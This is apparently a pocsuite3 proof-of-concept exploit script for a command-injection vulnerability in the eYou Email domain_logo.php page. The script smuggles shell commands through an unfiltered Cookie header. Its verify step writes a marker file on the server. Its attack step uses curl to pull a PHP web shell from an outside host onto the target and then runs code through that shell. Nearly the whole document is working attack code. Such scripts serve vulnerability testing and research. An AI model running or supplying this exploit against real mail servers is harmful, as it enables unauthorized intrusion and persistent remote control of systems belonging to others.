eYou Email /domain_logo.php 命令执行漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from pocsuite3.lib.utils import random_str as randoms1 from requests.exceptions import ReadTimeout class DemoPOC(POCBase): vulID = '1240' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2013-10-01' createDate = '2014-4-8' updateDate = '2014-4-8' references = ['http://www.wooyun.org/bugs/wooyun-2013-027523'] name = 'eYou Email /domain_logo.php 命令执行漏洞 POC' appPowerLink = 'http://www.eyou.net' appName = 'eYou' appVersion = '#' vulType = 'Command Execution' desc = '''grad/admin/domain_logo.php 中，取得cookie后未经过滤带入 popen 命令， 造成了命令执行，可以getshell。 ''' samples = [] install_requires = [''] def _verify(self): result = {} var_url = '%s/grad/admin/domain_logo.php' % self.url random_str = randoms1(10) headers = {'Cookie': "cookie=/php/lib/||echo %s>%s.txt#" % (random_str, random_str[:5])} requests.get(var_url,headers=headers) url = '%s/grad/admin/%s.txt' % (self.url, random_str[:5]) resp = requests.get(url).text if random_str in resp: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): result = {} random_filename = randoms1(10) var_url = '%s/grad/admin/domain_logo.php' % self.url shell = "http://pocsuite.org/include_files/php_attack.txt" headers = {'Cookie': 'cookie=/php/lib/||curl %s>%s.php#' % (shell, random_filename)} request = requests.get(var_url, headers=headers) shell_url = '%s/grad/admin/%s.php' % (self.url, random_filename) param = {'c': 'echo strrev(%s);' % random_filename} r = requests.post(shell_url, data=param).text if str(random_filename)[::-1] in r: result['ShellInfo'] = {'URL': shell_url, 'Content': shell_url} return self.parse_output(result) register_poc(DemoPOC)